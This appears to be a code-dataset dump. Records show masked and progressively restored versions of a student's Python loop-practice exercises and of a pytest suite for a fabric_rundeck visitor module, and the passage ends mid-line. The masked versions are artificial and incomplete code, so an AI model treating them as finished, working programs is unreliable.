'22':\n numbers = []\n for x in range(10):\n numbers.append([])\n for x in range(1, 111):\n if x < 12:\n numbers[0].append(x)\n elif x < 23:\n numbers[1].append(x)\n elif x < 34:\n numbers[2].append(x)\n elif x < 45:\n numbers[3].append(x)\n elif x < 56:\n numbers[4].append(x)\n elif x < 67:\n numbers[5].append(x)\n elif x < 78:\n numbers[6].append(x)\n elif x < 89:\n numbers[7].append(x)\n elif x < 100:\n numbers[8].append(x)\n elif x < 111:\n numbers[9].append(x)\n for x in range(len(numbers)):\n for y in range(11):\n word = ''\n tampered = False\n if int(numbers[x][y]) % 3 == 0:\n word = word + 'Coza'\n tampered = True\n if int(numbers[x][y]) % 5 == 0:\n word = word + 'Loza'\n tampered = True\n if int(numbers[x][y]) % 7 == 0:\n word = word + 'Woza'\n tampered = True\n if tampered:\n numbers[x][y] = word\n for x in range(len(numbers)):\n print(*numbers[x])\n<mask token>\nif sys.argv[1] == '23':\n x = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n y = x\n numbers = []\n for r in range(len(x)):\n for z in range(len(y)):\n print(int(x[r]) * int(y[z]), end=' ')\n print('')\n<mask token>\nif sys.argv[1] == '25':\n number = input('Enter the number that you wish to reverse: ')\n number = str(number)\n n = []\n for x in range(len(number)):\n n.append(number[len(number) - 1 - x])\n for x in range(len(n)):\n print(n[x], end=' ')\n print('')\n",
"step-3": "import sys\nimport random\n<mask token>\nif sys.argv[1] == '1':\n for x in range(5):\n print(str(x))\n<mask token>\nif sys.argv[1] == '2':\n for x in range(5):\n print(str(4 - x))\n<mask token>\nif sys.argv[1] == '3':\n for x in range(11):\n print(str(15 - x))\n<mask token>\nif sys.argv[1] == '4':\n for x in range(11):\n print(str(-5 + x))\n<mask token>\nif sys.argv[1] == '5':\n for x in range(25, 50):\n if x % 2 != 0:\n print(x)\n for x in range(26):\n if x % 2 == 0:\n print(str(25 + x))\n<mask token>\nif sys.argv[1] == '6':\n for x in range(1, 11):\n print(str(x ** 2))\n<mask token>\nif sys.argv[1] == '8':\n for x in range(4, 58):\n print(x)\n days = 57 - x\n print('Days remaining to reach 57:', str(days))\n<mask token>\nif sys.argv[1] == '9':\n while True:\n students = input('Number of students (excluding the girl): ')\n jellybeans = input('Number of jelly beans: ')\n try:\n students = int(students)\n jellybeans = int(jellybeans)\n break\n except ValueError:\n print('Please enter an integer for jelly beans and students.')\n days = 0\n while jellybeans > 0:\n jellybeans = jellybeans - students - 2\n days = days + 1\n print(days)\n<mask token>\nif sys.argv[1] == '17':\n for x in range(2, 21):\n num = 1 / x\n print('1/' + str(x), '=', str(num))\n<mask token>\nif sys.argv[1] == '18':\n total = 0\n for x in range(1, 101):\n total = total + x\n print('Total: ' + str(total))\n avg = total / x\n print('Average: ' + str(avg))\n<mask token>\nif sys.argv[1] == '19':\n it = int(input('Enter the number of iterations: '))\n num = 0\n for x in range(1, it * 2):\n if x % 2 != 0:\n if (x - 3) % 4 == 0:\n num = num - 1 / x\n else:\n num = num + 1 / x\n print(str(4 * num))\n<mask token>\nif sys.argv[1] == '22':\n numbers = []\n for x in range(10):\n numbers.append([])\n for x in range(1, 111):\n if x < 12:\n numbers[0].append(x)\n elif x < 23:\n numbers[1].append(x)\n elif x < 34:\n numbers[2].append(x)\n elif x < 45:\n numbers[3].append(x)\n elif x < 56:\n numbers[4].append(x)\n elif x < 67:\n numbers[5].append(x)\n elif x < 78:\n numbers[6].append(x)\n elif x < 89:\n numbers[7].append(x)\n elif x < 100:\n numbers[8].append(x)\n elif x < 111:\n numbers[9].append(x)\n for x in range(len(numbers)):\n for y in range(11):\n word = ''\n tampered = False\n if int(numbers[x][y]) % 3 == 0:\n word = word + 'Coza'\n tampered = True\n if int(numbers[x][y]) % 5 == 0:\n word = word + 'Loza'\n tampered = True\n if int(numbers[x][y]) % 7 == 0:\n word = word + 'Woza'\n tampered = True\n if tampered:\n numbers[x][y] = word\n for x in range(len(numbers)):\n print(*numbers[x])\n<mask token>\nif sys.argv[1] == '23':\n x = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n y = x\n numbers = []\n for r in range(len(x)):\n for z in range(len(y)):\n print(int(x[r]) * int(y[z]), end=' ')\n print('')\n<mask token>\nif sys.argv[1] == '25':\n number = input('Enter the number that you wish to reverse: ')\n number = str(number)\n n = []\n for x in range(len(number)):\n n.append(number[len(number) - 1 - x])\n for x in range(len(n)):\n print(n[x], end=' ')\n print('')\n",
"step-4": "# Kai Joseph\n# Loop Practice\n# Since I worked on my own, I did not have to complete all 25 challenges (with Ms. Healey's permission). I completed a total of 14 challenges.\n\n\nimport sys\nimport random\n\n\n''' 1. \n Write a for loop that will print out all the integers from 0-4 in ascending order. \n'''\n\nif sys.argv[1] == '1':\n\n\tfor x in range(5):\n\n\t\tprint(str(x))\n\n\n''' 2. \n Write a for loop that will print out all the integers from 0-4 in descending order.\n'''\n\nif sys.argv[1] == '2':\n\n\tfor x in range(5):\n\n\t\tprint(str(4-x))\n\n\n\n''' 3. \n Write a for loop that will print out all the integers from 5-15 in descending order.\n'''\n\nif sys.argv[1] == '3':\n\n\tfor x in range(11):\n\n\t\tprint(str(15-x))\n\n\n\n''' 4. \n Write a for loop that will print out all the integers from -5 to 5 in ascending order.\n'''\n\nif sys.argv[1] == '4':\n\n\tfor x in range(11):\n\n\t\tprint(str(-5+x))\n\n\n\n\n''' 5. \n Write two for loops that will both print out odd numbers from 25 to 49. The loops themselves must be different, but they will have the same output.\n'''\n\nif sys.argv[1] == '5':\n\n\tfor x in range(25,50):\n\n\t\tif x%2 != 0:\n\n\t\t\tprint(x)\n\n\tfor x in range(26):\n\n\t\tif x%2 == 0:\n\n\t\t\tprint(str(25+x))\n\n\n\n''' 6. \n Write a for loop that prints out the squares of the numbers from 1 to 10. ie 1, 4, 9, 16, ... 100\n'''\n\nif sys.argv[1] == '6':\n\n\tfor x in range(1,11):\n\n\t\tprint(str(x**2))\n\n\n\n''' 8. \n A number starts at 4 and increases by one every day after the day it was created. Write a loop and use the variable days (int) that will print out how many days it will take for number to reach 57. \n'''\n\nif sys.argv[1] == '8':\n\n\tfor x in range(4,58):\n\n\t\tprint(x)\n\n\t\tdays = 57-x\n\n\t\tprint(\"Days remaining to reach 57:\",str(days))\n\n\n\n''' 9. \n A girl in your class has jellybeans in a jar. The number of jellybeans is stored in int beans. Every day she shares one jellybean with every student in the class, and she herself takes two. The number of students in the class is held in variable students (int). Write a loop that determines how many days it will take for her to run out of jellybeans. You can store the result in variable numDays (int).\n'''\n\nif sys.argv[1] == '9':\n\n\twhile True:\n\n\t\tstudents = input(\"Number of students (excluding the girl): \")\n\n\t\tjellybeans = input(\"Number of jelly beans: \")\n\n\t\ttry:\n\n\t\t\tstudents = int(students)\n\n\t\t\tjellybeans = int(jellybeans)\n\n\t\t\tbreak\n\n\t\texcept ValueError:\n\n\t\t\tprint(\"Please enter an integer for jelly beans and students.\")\n\n\tdays = 0\n\n\twhile jellybeans > 0:\n\n\t\tjellybeans = jellybeans - students - 2\n\n\t\tdays = days + 1\n\n\n\tprint(days)\n\n\n\n\n\n''' 17. \n Write a loop that will print out the decimal equivalents of 1/2, 1/3, 1/4, 1/5, 1/6, ... 1/20. The output for each iteration should look like:\n \"1/2 = .5\" \"1/3 = .666666666667\" etc.\n'''\n\n\nif sys.argv[1] == '17':\n\n\tfor x in range(2,21):\n\n\t\tnum = 1/x\n\n\t\tprint(\"1/\"+str(x),\"=\",str(num))\n\n\n\n\n''' 18. \n Write a loop that determines the sum of all the numbers from 1-100, as well as the average. Store the sum in variable total (int) and the average in variable avg (float).\n'''\n\nif sys.argv[1] == '18':\n\n\ttotal = 0\n\n\tfor x in range(1,101):\n\n\t\ttotal = total+x\n\n\tprint(\"Total: \"+str(total))\n\n\tavg = total/x\n\n\tprint(\"Average: \" + str(avg))\n\n\n\n\n''' 19. \n A friend tells you that PI can be computed with the following equation:\n PI = 4 * (1-1/3+1/5-1/7+1/9-1/11+1/13-1/15...)\n Write a loop that will calculate this output for n-iterations of the pattern (n being an int), that could help you determine if your friend is right or wrong. Are they right or wrong?\n'''\n\nif sys.argv[1] == '19':\n\n\tit = int(input(\"Enter the number of iterations: \"))\n\n\tnum = 0\n\n\tfor x in range(1,it*2):\n\n\t\tif x%2 != 0:\n\n\t\t\tif (x-3)%4 == 0:\n\n\t\t\t\tnum = num - (1/x)\n\n\t\t\telse:\n\n\t\t\t\tnum = num + (1/x)\n\n\n\tprint(str(4*num))\n\n\n\n''' 22. \n Write a loop which prints the numbers 1 to 110, 11 numbers per line. The program shall print \"Coza\" in place of the numbers which are multiples of 3, \"Loza\" for multiples of 5, \"Woza\" for multiples of 7, \"CozaLoza\" for multiples of 3 and 5, and so on. Sample output:\n 1 2 Coza 4 Loza Coza Woza 8 Coza Loza 11 \n Coza 13 Woza CozaLoza 16 17 Coza 19 Loza CozaWoza 22 \n 23 Coza Loza 26 Coza Woza 29 CozaLoza 31 32 Coza\n ......\n'''\n\nif sys.argv[1] == '22':\n\n\tnumbers = []\n\n\tfor x in range(10):\n\n\t\tnumbers.append([])\n\n\tfor x in range(1,111):\n\n\t\tif x < 12:\n\n\t\t\tnumbers[0].append(x)\n\n\t\telif x < 23:\n\n\t\t\tnumbers[1].append(x)\n\n\t\telif x < 34:\n\n\t\t\tnumbers[2].append(x)\n\n\t\telif x < 45:\n\n\t\t\tnumbers[3].append(x)\n\n\t\telif x < 56:\n\n\t\t\tnumbers[4].append(x)\n\n\t\telif x < 67:\n\n\t\t\tnumbers[5].append(x)\n\n\t\telif x < 78:\n\n\t\t\tnumbers[6].append(x)\n\n\t\telif x < 89:\n\n\t\t\tnumbers[7].append(x)\n\n\t\telif x < 100:\n\n\t\t\tnumbers[8].append(x)\n\n\t\telif x < 111:\n\n\t\t\tnumbers[9].append(x)\n\n\n\tfor x in range(len(numbers)):\n\n\t\tfor y in range(11):\n\n\t\t\tword = \"\"\n\n\t\t\ttampered = False\n\n\t\t\tif int(numbers[x][y])%3 == 0:\n\n\t\t\t\tword = word + \"Coza\"\n\n\t\t\t\ttampered = True\n\n\t\t\tif int(numbers[x][y])%5 == 0:\n\n\t\t\t\tword = word + \"Loza\"\n\n\t\t\t\ttampered = True\n\n\t\t\tif int(numbers[x][y])%7 == 0:\n\n\t\t\t\tword = word + \"Woza\"\n\n\t\t\t\ttampered = True\n\n\t\t\tif tampered:\n\n\t\t\t\tnumbers[x][y] = word\n\n\tfor x in range(len(numbers)):\n\n\t\tprint(*numbers[x])\n\n\n\n''' 23.\n Write code that will print out a times-table for practice and reference. It should look like this:\n * | 1 2 3 4 5 6 7 8 9\n -------------------------------\n 1 | 1 2 3 4 5 6 7 8 9\n 2 | 2 4 6 8 10 12 14 16 18\n 3 | 3 6 9 12 15 18 21 24 27\n 4 | 4 8 12 16 20 24 28 32 36\n 5 | 5 10 15 20 25 30 35 40 45\n 6 | 6 12 18 24 30 36 42 48 54\n 7 | 7 14 21 28 35 42 49 56 63\n 8 | 8 16 24 32 40 48 56 64 72\n 9 | 9 18 27 36 45 54 63 72 81\n'''\n\n\nif sys.argv[1] == '23':\n\n\tx = [1,2,3,4,5,6,7,8,9]\n\n\ty = x\n\n\tnumbers = []\n\n\tfor r in range(len(x)):\n\n\t\tfor z in range(len(y)):\n\n\t\t\tprint((int(x[r])*int(y[z])),end=\" \")\n\n\t\tprint(\"\")\n\n\n\n''' 25. \n Write code that will extract each digit from an int stored in variable number, in the reverse order. For example, if the int is 15423, the output shall be \"3 2 4 5 1\", with a space separating the digits. \n'''\n\nif sys.argv[1] == '25':\n\n\tnumber = input(\"Enter the number that you wish to reverse: \")\n\n\tnumber = str(number)\n\n\tn = []\n\n\tfor x in range(len(number)):\n\n\t\tn.append(number[len(number)-1-x])\n\n\tfor x in range(len(n)):\n\n\t\tprint(n[x],end=\" \")\n\n\tprint(\"\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#
# Author:: Noah Kantrowitz <[email protected]>
#
# Copyright 2014, Noah Kantrowitz
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
from fabric.api import task, roles
import pytest
from fabric_rundeck import visitor
def fixture_path(*path):
return os.path.join(os.path.dirname(__file__), 'data', *path)
class TestUnwrap(object):
@pytest.fixture
def fn(self):
def fn():
pass
return fn
def test_fn(self, fn):
assert visitor.unwrap(fn) is fn
def test_task(self, fn):
t = task(fn)
assert visitor.unwrap(t) is fn
def test_taskcall(self, fn):
t = task()(fn)
assert visitor.unwrap(t) is fn
def test_task_roles(self, fn):
t = task(roles('foo')(fn))
assert visitor.unwrap(t) is fn
def test_taskcall_roles(self, fn):
t = task()(roles('foo')(fn))
assert visitor.unwrap(t) is fn
def test_roles_task(self, fn):
t = roles('foo')(task(fn))
assert visitor.unwrap(t) is fn
def test_roles_taskcall(self, fn):
t = roles('foo')(task()(fn))
assert visitor.unwrap(t) is fn
def test_lambda(self):
fn = lambda: None
assert visitor.unwrap(fn) is fn
def test_lambda_task(self):
fn = lambda: None
t = task(fn)
assert visitor.unwrap(t) is fn
class TestVisitTask(object):
def test_no_args(self):
def fn():
pass
assert visitor.visit_task(fn, ()) == {
'name': 'fn',
'path': (),
'doc': None,
'cron': None,
'argspec': {
'args': [],
'varargs': None,
'keywords': None,
'defaults': None,
},
}
def test_simple_args(self):
def fn(a, b):
pass
assert visitor.visit_task(fn, ()) == {
'name': 'fn',
'path': (),
'doc': None,
'cron': None,
'argspec': {
'args': ['a', 'b'],
'varargs': None,
'keywords': None,
'defaults': None,
},
}
def test_arg_defaults(self):
def fn(a, b=1, c=None):
pass
assert visitor.visit_task(fn, ()) == {
'name': 'fn',
'path': (),
'doc': None,
'cron': None,
'argspec': {
'args': ['a', 'b', 'c'],
'varargs': None,
'keywords': None,
'defaults': (1, None),
},
}
def test_varargs(self):
def fn(*args, **kwargs):
pass
assert visitor.visit_task(fn, ()) == {
'name': 'fn',
'path': (),
'doc': None,
'cron': None,
'argspec': {
'args': [],
'varargs': 'args',
'keywords': 'kwargs',
'defaults': None,
},
}
def test_docs(self):
def fn(*args, **kwargs):
"""I am a teapot."""
pass
assert visitor.visit_task(fn, ()) == {
'name': 'fn',
'path': (),
'doc': 'I am a teapot.',
'cron': None,
'argspec': {
'args': [],
'varargs': 'args',
'keywords': 'kwargs',
'defaults': None,
},
}
class TestVisit(object):
def test_single(self):
def fn():
pass
callables = {
'fn': fn,
}
data = visitor.visit(callables)
assert len(data) == 1
assert data[0]['name'] == 'fn'
def test_multi(self):
def fn():
pass
def fn2():
pass
def fn3():
pass
callables = {
'fn': fn,
'fn2': fn2,
'fn3': fn3,
}
data = visitor.visit(callables)
assert len(data) == 3
assert data[0]['name'] == 'fn'
assert data[1]['name'] == 'fn2'
assert data[2]['name'] == 'fn3'
def test_nested(self):
def fn():
pass
def fn2():
pass
def fn3():
pass
callables = {
'fn': fn,
'mod': {
'fn2': fn2,
'fn3': fn3,
}
}
data = visitor.visit(callables)
assert len(data) == 3
assert data[0]['name'] == 'fn'
assert data[0]['path'] == ()
assert data[1]['name'] == 'fn2'
assert data[1]['path'] == ('mod',)
assert data[2]['name'] == 'fn3'
assert data[2]['path'] == ('mod',)
class TestVisitFabfile(object):
def test_one(self):
data = visitor.visit_fabfile(fixture_path('fabfile_one.py'))
assert len(data) == 3
|
normal
|
{
"blob_id": "a1e563f94044ff7cd7e0e55542bc4ca2db81df28",
"index": 9749,
"step-1": "<mask token>\n\n\nclass TestUnwrap(object):\n\n @pytest.fixture\n def fn(self):\n\n def fn():\n pass\n return fn\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass TestVisitTask(object):\n\n def test_no_args(self):\n\n def fn():\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': [], 'varargs':\n None, 'keywords': None, 'defaults': None}}\n\n def test_simple_args(self):\n\n def fn(a, b):\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': ['a', 'b'],\n 'varargs': None, 'keywords': None, 'defaults': None}}\n\n def test_arg_defaults(self):\n\n def fn(a, b=1, c=None):\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': ['a', 'b', 'c'],\n 'varargs': None, 'keywords': None, 'defaults': (1, None)}}\n\n def test_varargs(self):\n\n def fn(*args, **kwargs):\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': [], 'varargs':\n 'args', 'keywords': 'kwargs', 'defaults': None}}\n\n def test_docs(self):\n\n def fn(*args, **kwargs):\n \"\"\"I am a teapot.\"\"\"\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': 'I am a teapot.', 'cron': None, 'argspec': {'args': [],\n 'varargs': 'args', 'keywords': 'kwargs', 'defaults': None}}\n\n\nclass TestVisit(object):\n\n def test_single(self):\n\n def fn():\n pass\n callables = {'fn': fn}\n data = visitor.visit(callables)\n assert len(data) == 1\n assert data[0]['name'] == 'fn'\n\n def test_multi(self):\n\n def fn():\n pass\n\n def fn2():\n pass\n\n def fn3():\n pass\n callables = {'fn': fn, 'fn2': fn2, 'fn3': fn3}\n data = visitor.visit(callables)\n assert len(data) == 3\n assert data[0]['name'] == 'fn'\n assert data[1]['name'] == 'fn2'\n assert data[2]['name'] == 'fn3'\n\n def test_nested(self):\n\n def fn():\n pass\n\n def fn2():\n pass\n\n def fn3():\n pass\n callables = {'fn': fn, 'mod': {'fn2': fn2, 'fn3': fn3}}\n data = visitor.visit(callables)\n assert len(data) == 3\n assert data[0]['name'] == 'fn'\n assert data[0]['path'] == ()\n assert data[1]['name'] == 'fn2'\n assert data[1]['path'] == ('mod',)\n assert data[2]['name'] == 'fn3'\n assert data[2]['path'] == ('mod',)\n\n\nclass TestVisitFabfile(object):\n\n def test_one(self):\n data = visitor.visit_fabfile(fixture_path('fabfile_one.py'))\n assert len(data) == 3\n",
"step-2": "<mask token>\n\n\nclass TestUnwrap(object):\n\n @pytest.fixture\n def fn(self):\n\n def fn():\n pass\n return fn\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def test_roles_task(self, fn):\n t = roles('foo')(task(fn))\n assert visitor.unwrap(t) is fn\n <mask token>\n <mask token>\n <mask token>\n\n\nclass TestVisitTask(object):\n\n def test_no_args(self):\n\n def fn():\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': [], 'varargs':\n None, 'keywords': None, 'defaults': None}}\n\n def test_simple_args(self):\n\n def fn(a, b):\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': ['a', 'b'],\n 'varargs': None, 'keywords': None, 'defaults': None}}\n\n def test_arg_defaults(self):\n\n def fn(a, b=1, c=None):\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': ['a', 'b', 'c'],\n 'varargs': None, 'keywords': None, 'defaults': (1, None)}}\n\n def test_varargs(self):\n\n def fn(*args, **kwargs):\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': [], 'varargs':\n 'args', 'keywords': 'kwargs', 'defaults': None}}\n\n def test_docs(self):\n\n def fn(*args, **kwargs):\n \"\"\"I am a teapot.\"\"\"\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': 'I am a teapot.', 'cron': None, 'argspec': {'args': [],\n 'varargs': 'args', 'keywords': 'kwargs', 'defaults': None}}\n\n\nclass TestVisit(object):\n\n def test_single(self):\n\n def fn():\n pass\n callables = {'fn': fn}\n data = visitor.visit(callables)\n assert len(data) == 1\n assert data[0]['name'] == 'fn'\n\n def test_multi(self):\n\n def fn():\n pass\n\n def fn2():\n pass\n\n def fn3():\n pass\n callables = {'fn': fn, 'fn2': fn2, 'fn3': fn3}\n data = visitor.visit(callables)\n assert len(data) == 3\n assert data[0]['name'] == 'fn'\n assert data[1]['name'] == 'fn2'\n assert data[2]['name'] == 'fn3'\n\n def test_nested(self):\n\n def fn():\n pass\n\n def fn2():\n pass\n\n def fn3():\n pass\n callables = {'fn': fn, 'mod': {'fn2': fn2, 'fn3': fn3}}\n data = visitor.visit(callables)\n assert len(data) == 3\n assert data[0]['name'] == 'fn'\n assert data[0]['path'] == ()\n assert data[1]['name'] == 'fn2'\n assert data[1]['path'] == ('mod',)\n assert data[2]['name'] == 'fn3'\n assert data[2]['path'] == ('mod',)\n\n\nclass TestVisitFabfile(object):\n\n def test_one(self):\n data = visitor.visit_fabfile(fixture_path('fabfile_one.py'))\n assert len(data) == 3\n",
"step-3": "<mask token>\n\n\nclass TestUnwrap(object):\n\n @pytest.fixture\n def fn(self):\n\n def fn():\n pass\n return fn\n\n def test_fn(self, fn):\n assert visitor.unwrap(fn) is fn\n\n def test_task(self, fn):\n t = task(fn)\n assert visitor.unwrap(t) is fn\n <mask token>\n\n def test_task_roles(self, fn):\n t = task(roles('foo')(fn))\n assert visitor.unwrap(t) is fn\n\n def test_taskcall_roles(self, fn):\n t = task()(roles('foo')(fn))\n assert visitor.unwrap(t) is fn\n\n def test_roles_task(self, fn):\n t = roles('foo')(task(fn))\n assert visitor.unwrap(t) is fn\n <mask token>\n <mask token>\n\n def test_lambda_task(self):\n fn = lambda : None\n t = task(fn)\n assert visitor.unwrap(t) is fn\n\n\nclass TestVisitTask(object):\n\n def test_no_args(self):\n\n def fn():\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': [], 'varargs':\n None, 'keywords': None, 'defaults': None}}\n\n def test_simple_args(self):\n\n def fn(a, b):\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': ['a', 'b'],\n 'varargs': None, 'keywords': None, 'defaults': None}}\n\n def test_arg_defaults(self):\n\n def fn(a, b=1, c=None):\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': ['a', 'b', 'c'],\n 'varargs': None, 'keywords': None, 'defaults': (1, None)}}\n\n def test_varargs(self):\n\n def fn(*args, **kwargs):\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': [], 'varargs':\n 'args', 'keywords': 'kwargs', 'defaults': None}}\n\n def test_docs(self):\n\n def fn(*args, **kwargs):\n \"\"\"I am a teapot.\"\"\"\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': 'I am a teapot.', 'cron': None, 'argspec': {'args': [],\n 'varargs': 'args', 'keywords': 'kwargs', 'defaults': None}}\n\n\nclass TestVisit(object):\n\n def test_single(self):\n\n def fn():\n pass\n callables = {'fn': fn}\n data = visitor.visit(callables)\n assert len(data) == 1\n assert data[0]['name'] == 'fn'\n\n def test_multi(self):\n\n def fn():\n pass\n\n def fn2():\n pass\n\n def fn3():\n pass\n callables = {'fn': fn, 'fn2': fn2, 'fn3': fn3}\n data = visitor.visit(callables)\n assert len(data) == 3\n assert data[0]['name'] == 'fn'\n assert data[1]['name'] == 'fn2'\n assert data[2]['name'] == 'fn3'\n\n def test_nested(self):\n\n def fn():\n pass\n\n def fn2():\n pass\n\n def fn3():\n pass\n callables = {'fn': fn, 'mod': {'fn2': fn2, 'fn3': fn3}}\n data = visitor.visit(callables)\n assert len(data) == 3\n assert data[0]['name'] == 'fn'\n assert data[0]['path'] == ()\n assert data[1]['name'] == 'fn2'\n assert data[1]['path'] == ('mod',)\n assert data[2]['name'] == 'fn3'\n assert data[2]['path'] == ('mod',)\n\n\nclass TestVisitFabfile(object):\n\n def test_one(self):\n data = visitor.visit_fabfile(fixture_path('fabfile_one.py'))\n assert len(data) == 3\n",
"step-4": "import os\nfrom fabric.api import task, roles\nimport pytest\nfrom fabric_rundeck import visitor\n\n\ndef fixture_path(*path):\n return os.path.join(os.path.dirname(__file__), 'data', *path)\n\n\nclass TestUnwrap(object):\n\n @pytest.fixture\n def fn(self):\n\n def fn():\n pass\n return fn\n\n def test_fn(self, fn):\n assert visitor.unwrap(fn) is fn\n\n def test_task(self, fn):\n t = task(fn)\n assert visitor.unwrap(t) is fn\n\n def test_taskcall(self, fn):\n t = task()(fn)\n assert visitor.unwrap(t) is fn\n\n def test_task_roles(self, fn):\n t = task(roles('foo')(fn))\n assert visitor.unwrap(t) is fn\n\n def test_taskcall_roles(self, fn):\n t = task()(roles('foo')(fn))\n assert visitor.unwrap(t) is fn\n\n def test_roles_task(self, fn):\n t = roles('foo')(task(fn))\n assert visitor.unwrap(t) is fn\n\n def test_roles_taskcall(self, fn):\n t = roles('foo')(task()(fn))\n assert visitor.unwrap(t) is fn\n\n def test_lambda(self):\n fn = lambda : None\n assert visitor.unwrap(fn) is fn\n\n def test_lambda_task(self):\n fn = lambda : None\n t = task(fn)\n assert visitor.unwrap(t) is fn\n\n\nclass TestVisitTask(object):\n\n def test_no_args(self):\n\n def fn():\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': [], 'varargs':\n None, 'keywords': None, 'defaults': None}}\n\n def test_simple_args(self):\n\n def fn(a, b):\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': ['a', 'b'],\n 'varargs': None, 'keywords': None, 'defaults': None}}\n\n def test_arg_defaults(self):\n\n def fn(a, b=1, c=None):\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': ['a', 'b', 'c'],\n 'varargs': None, 'keywords': None, 'defaults': (1, None)}}\n\n def test_varargs(self):\n\n def fn(*args, **kwargs):\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': [], 'varargs':\n 'args', 'keywords': 'kwargs', 'defaults': None}}\n\n def test_docs(self):\n\n def fn(*args, **kwargs):\n \"\"\"I am a teapot.\"\"\"\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': 'I am a teapot.', 'cron': None, 'argspec': {'args': [],\n 'varargs': 'args', 'keywords': 'kwargs', 'defaults': None}}\n\n\nclass TestVisit(object):\n\n def test_single(self):\n\n def fn():\n pass\n callables = {'fn': fn}\n data = visitor.visit(callables)\n assert len(data) == 1\n assert data[0]['name'] == 'fn'\n\n def test_multi(self):\n\n def fn():\n pass\n\n def fn2():\n pass\n\n def fn3():\n pass\n callables = {'fn': fn, 'fn2': fn2, 'fn3': fn3}\n data = visitor.visit(callables)\n assert len(data) == 3\n assert data[0]['name'] == 'fn'\n assert data[1]['name'] == 'fn2'\n assert data[2]['name'] == 'fn3'\n\n def test_nested(self):\n\n def fn():\n pass\n\n def fn2():\n pass\n\n def fn3():\n pass\n callables = {'fn': fn, 'mod': {'fn2': fn2, 'fn3': fn3}}\n data = visitor.visit(callables)\n assert len(data) == 3\n assert data[0]['name'] == 'fn'\n assert data[0]['path'] == ()\n assert data[1]['name'] == 'fn2'\n assert data[1]['path'] == ('mod',)\n assert data[2]['name'] == 'fn3'\n assert data[2]['path'] == ('mod',)\n\n\nclass TestVisitFabfile(object):\n\n def test_one(self):\n data = visitor.visit_fabfile(fixture_path('fabfile_one.py'))\n assert len(data) == 3\n",
"step-5": "#\n# Author:: Noah Kantrowitz <[email protected]>\n#\n# Copyright 2014, Noah Kantrowitz\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport os\n\nfrom fabric.api import task, roles\nimport pytest\n\nfrom fabric_rundeck import visitor\n\n\ndef fixture_path(*path):\n return os.path.join(os.path.dirname(__file__), 'data', *path)\n\n\nclass TestUnwrap(object):\n @pytest.fixture\n def fn(self):\n def fn():\n pass\n return fn\n\n def test_fn(self, fn):\n assert visitor.unwrap(fn) is fn\n\n def test_task(self, fn):\n t = task(fn)\n assert visitor.unwrap(t) is fn\n\n def test_taskcall(self, fn):\n t = task()(fn)\n assert visitor.unwrap(t) is fn\n\n def test_task_roles(self, fn):\n t = task(roles('foo')(fn))\n assert visitor.unwrap(t) is fn\n\n def test_taskcall_roles(self, fn):\n t = task()(roles('foo')(fn))\n assert visitor.unwrap(t) is fn\n\n def test_roles_task(self, fn):\n t = roles('foo')(task(fn))\n assert visitor.unwrap(t) is fn\n\n def test_roles_taskcall(self, fn):\n t 